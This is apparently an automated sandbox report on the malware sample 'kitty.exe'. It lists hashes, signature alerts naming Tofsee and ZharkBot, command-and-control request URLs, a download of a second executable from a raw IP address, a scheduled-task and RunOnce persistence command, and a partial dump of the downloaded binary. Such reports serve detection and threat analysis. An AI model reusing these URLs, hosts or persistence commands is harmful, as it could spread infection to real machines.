Summary | ZeroBOX

kitty.exe

Generic Malware Malicious Library UPX PE64 PE File OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 9, 2024, 7:47 a.m. Aug. 9, 2024, 7:51 a.m.
Size 319.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0ec1f7cc17b6402cd2df150e0e5e92ca
SHA256 4c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4
CRC32 D3DB57C7
ssdeep 6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
fusionflow-meta.net 172.67.162.233
IP Address Status Action
104.21.74.211 Active Moloch
164.124.101.2 Active Moloch
185.216.214.225 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 104.21.74.211:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 104.21.74.211:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 185.216.214.225:80 2054413 ET MALWARE ZharkBot User-Agent Observed A Network Trojan was detected
TCP 192.168.56.101:49166 -> 185.216.214.225:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.216.214.225:80 -> 192.168.56.101:49166 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.216.214.225:80 -> 192.168.56.101:49166 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49165
104.21.74.211:443
C=US, O=Google Trust Services, CN=WE1 CN=fusionflow-meta.net 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a
TLSv1
192.168.56.101:49167
104.21.74.211:443
C=US, O=Google Trust Services, CN=WE1 CN=fusionflow-meta.net 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "Cerker.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "Cerker.exe" has successfully been created.
console_handle: 0x00000007
1 1 0
suspicious_features Connection to IP address suspicious_request GET http://185.216.214.225/mingh.exe
request GET http://185.216.214.225/mingh.exe
request GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7
request GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4
description Cerker.exe tried to sleep 230 seconds, actually delayed analysis time by 230 seconds
file C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
cmdline C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F
file C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
wmi SELECT * FROM Win32_Processor
wmi SELECT * FROM Win32_BaseBoard
wmi SELECT * FROM Win32_DiskDrive
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†$aYð h @ À`…@@  Ô H.textüg h `.rsrcÔ j@@H(?ÔHÝ ª†”cl>°!//°†.f>/´!4¯.j> ƒ2!.¯›.O>¸:!®•«•¯•¿¶ÈŒj•’©¦‘£0¦0¡0äØ)0Þ Ç4  €h= ÉšÉ‹ÉɬõœÍ¬ÏÇ(ú”êöÐBɳõÉͯÏTÇpúê÷ÐTɧõÊÍýÏYÇ[¾S¾^¾¤C(§˜¾<‚º'¸°®+³+¨+\¼Ù2e+Îà/Ü-,%A½Ü2d+ݬ/Î-e%¥ˆ2{+œø/Ó-i%H­Û2o+ø!£>£&£O¥³­Ñw€Pºî£GŸ#§A¥í­Ã6€Cºá£\Ÿ`§¥ú­Î6€Rºý£_Ÿb§¥ñ­Ï#€^ºý£dŸf`n9”D–¿ž£ ³ ‰È¥Ï¥Á¥¥ë™‘¡û£«s–ņ$ò"ò.òWëáòYÎpöYôÏü‹88€8ô<º>6] ¡Æ!y8£õ<Ã>AãEãMãå“í¡ÐlÀI]\]D]1[˜S²nZ~4D„]+aY1[žS²nP~4D”]>aY([ÅS©nX~/D7¹7¹9¹?üü0üÉÏ,ßEåèüYÀNøWú½òÑÏ%ßPååü^À=ø^úüòØÏ(ßJåâü ÀyøIúéòÆÏ&ßYåáüXÀnøBúÈòØqÙqÈqíMÍ~ÍnÍÖþ£Ù¡Ù±Ù*ٖåÄè‡è×èÈì³îæ:ÛÝË´ñJè¢Ô‰ì¹îFæhÛÏËâñèñÔÆì²î æ.ÛÜËòñè¢Ôì îFæ*ÛÑË ñè¹Ô•ì²î4æÇÍÓ1$4ªIï+—»>$ô4R|S|G|f@–-Ö-€-„å4L-öÛ)õ+D#h“ 4A-áß)¥+U#=“á4-áÐ)ê+Z#=°4C-¤Í)é+Z#Rü¢ù¢ë¢ïŸ»>¢ž¨¦ §§§Ü§|›b£ SSSÀSloEWyUÿ].¼-¼4¼!¸º¡²öšõšíš0”©Á¹ÙUßUÅU¸S[&fÆv½LU暧šûš˜ƒ+š€¦¥ž˜œ7”©ý¹Ðƒ<šš¦¡žœ*”©°¹•ƒ;š•¦¡ž‡œ'”©ô¹ßƒ-š‡¦¥žœ6”©þ¹¹ƒÀÁÞöš!!…!ú']/ržù8[!ûÝ%Û'/ œü8u!ûÏ%æ'\/…Û8%¡?¡¡=‚\¸â¡Cw¥S§ä¯Ö’‚A¸î¡Yi¥§â¯Ë’‚l¸ø¡Zu¥Y§Á¯À’:‚d¸1«r««ø«M—z¯J­ç¥Õ˜ ˆ²ð«W—3¯V­ö¥É˜gˆB²ý«—j¯N­ý¥Õ˜gˆI²þ«@—3¯[­ç¥È˜"ˆW²ð«Q—C¯ŽCPwç;Í<"gûl(Žk¬ôöëTÒÀìO¡úãŽeòÇ©Zø>Oú&BìQw¢S#"¡îAŽ‰Êê+A>ð4Á²µ§ð-Óš¤¬MÚàkCã%ºÝðÏ-S#¹çQë=CßJðokf°À°ºî&>Üe\„¼/*A…bƒ7E?ç]`ËÊïû×|tø-6àESŠË. 4Øò®.¶dh^TSUV8}¤% údçBR982´úPdzmHçÇ¢\ì ƒ§¹®ÜÚ€™šHŠëc+/ÝZbVŸB• OµdzÙà?‡£\]3Û;-%¼ûcv-Å £c™E1hÐæ)fKc¿ÎÐÊ&†Ç(†4oORQŠš¤À›$“Ár(\1ã½q˜£§[Cž˜Ú:‡dÔÁÞ‡6A¥®?+ ¸È%žËTP±Ý¹­á>au'¿è ]B?"[ %îÎÁYw›¡yy…<n2"ã%h¤öߞ}îU®u‰·ü¥d™`5Fœæû¡ƒyØI Züñú./™ÒXì,îvÌ>È̑ˆÇÄ2]Z÷¢ÚkÛFdU.ÄvURþG\ÜYpö„ÔD° ¶—‘8¾Ó‹½g&‡Õ¿q<Qw?ˆ€gUé&+:­½›Ëc¢?ÅAß6Êљ6Ì^“vÐi™ém·AúÖØ$¤Ø®7yG 0‰1OÉ 9̦7®Šú›É¸*Wˆ:óømË.®[üÇpŸßg™Kb}".0¡i™©eõ !½õ•7ͶœmïJ9å[ºaÞô { ÂWxÂe ¸NÛ n¨I0˓Å2åg‚N©¬Ö.+²…éÑß´=ØÎdû]Ûª±q1RJ.ùIúÜî•øt»rà¯Wç¾wOVë b«é ¥Ôœ8z„ãü·<íôïDcJ\ƒÛ­„Áñøà;òBïåOòäï$׃÷[;²ž«Ï^ö‡¾( \ ©>˜HïºÇUž /‹Åc'Ÿùå!vDà¹1ß'äˆÎ-}á´ìð†àtÙGnboÈFÖ p7%Ð( € ¤7%Ð( €*:( *Ð&*:( *Ð&*ês €s €s €s! €s" € *Ð&*nþo5 þ*Ð &*:(6 *Ð&*>þ*Ð&*:(6 *Ð&*:(6 *Ð&*:€*Ð &*rs"(? t €*Ð!&*:(@ *Ð"&*(6 *fsá}G(6 *ÐH&*’sF}M(6 ~D }L*Ð|&*â(6  }S~D }Tj}U#}V*Ї&*v-+j}U}S*Г&*^n}U}S*Д&*^j}U}S*Е&*^n}U}S*Ж&*^j}U}S*З&*^n}U}S*И&*¦}U}S~G~ …‘œ*Й&*^…}U}S*К&*^l}V}S*Л&*^}V }S*М&*^}T }S*Н&*>}T*Щ&*>}Y*Ы&*:(6 *Ь&*Js¬€Z*Э&*Js°€\*Я&*î{^{toª ~t~t‘~ ‹‘Y _œ*о&*>}]*ÐÍ&*vþ}_}`*ÐÎ&*Rs· €a*ÐÔ&*:(6 *ÐÚ&*~s}j(È (ß*ÐÜ&*>}m*Ðê&*0 )~+[Ewߑ5£ÊXQߣ XăÐ& +¥ 4Hxaa ~ t%“ X“a 8|ÿÿÿ~tš% ,  8cÿÿÿ+ö t:*t~t   8:ÿÿÿs  u “ u X“a8ÿÿÿ X _ Àÿ_c`8íþÿÿ _,8Þþÿÿ ž‘Y+íb u %X “a`8°þÿÿ tŽi 8šþÿÿu t X Y“a u  ~ ~ ‘~W‘X Ä_œXX]“aÑo &t‘ ßY8.þÿÿ X 8 þÿÿ 1  8þÿÿ+öuo ~t t:¢8çýÿÿ t:*0æ E2’qjP ;%Ð
request_handle: 0x00cc000c
1 1 0
cmdline C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F
wmi SELECT * FROM Win32_Processor
host 185.216.214.225
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe reg_value C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
cmdline C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk.dll
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
file C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst